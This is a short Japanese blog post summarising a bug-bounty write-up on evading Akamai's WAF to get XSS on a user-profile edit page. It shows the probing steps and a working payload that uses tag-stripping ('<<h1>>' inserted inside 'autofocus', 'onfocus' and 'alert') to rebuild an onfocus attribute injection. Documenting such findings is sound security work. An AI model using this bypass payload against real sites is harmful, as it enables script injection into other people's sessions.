Hello there, ('ω')ノ

 

Akamai WAFを使用してWebサイトをバイパスした方法を。

 

脆弱性：

　XSS

 

記事：

　https://medium.com/@yusifceferov_/how-i-bypassed-website-using-akamai-waf-e4e907aeb161

 

今回は、AkamaiのWAFの使用してWebサイトをバイパスした方法を紹介することに。

ウェブサイトのユーザ情報編集ページでxssを実行すると。

ウェブサイトは、下記を受け入れたもののAkamaiのWAFとRegexを使用していて。

　“,’,<,>

 

次に、alert、prompt、<script>などを入力すると。

ウェブサイトの応答は、403 Forbidden AccessDeniedで。

 

 

さらに下記を入力すると。

　A A A<<h1>>A

 

ウェブサイトは、<<h1>>を削除して下記の応答をしてくれたので。

　A A AA

 

 

この方法で、ウェブサイトをバイパスすることを理解できて。

　alert,prompt ⇨ 403 Forbidden

　ale rt, pro m p t ⇨ 200 OK

　aler<<h1>>r ⇨ 200 OK 

 

よって、下記のペイロードを作成することに。

     Jordisssaa” auto<<h1>>focus/on<<h1>>focus=ale<<h1>>rt(9);//

 

 

ウェブサイトは、<<h1>>を削除して文字列を結合してくれて。

　Jordisssaa” autofocus/onfocus=alert(9);//

 

 

ソースコードにvalue値に入力することができて。

 

 

Best regards, (^^ゞ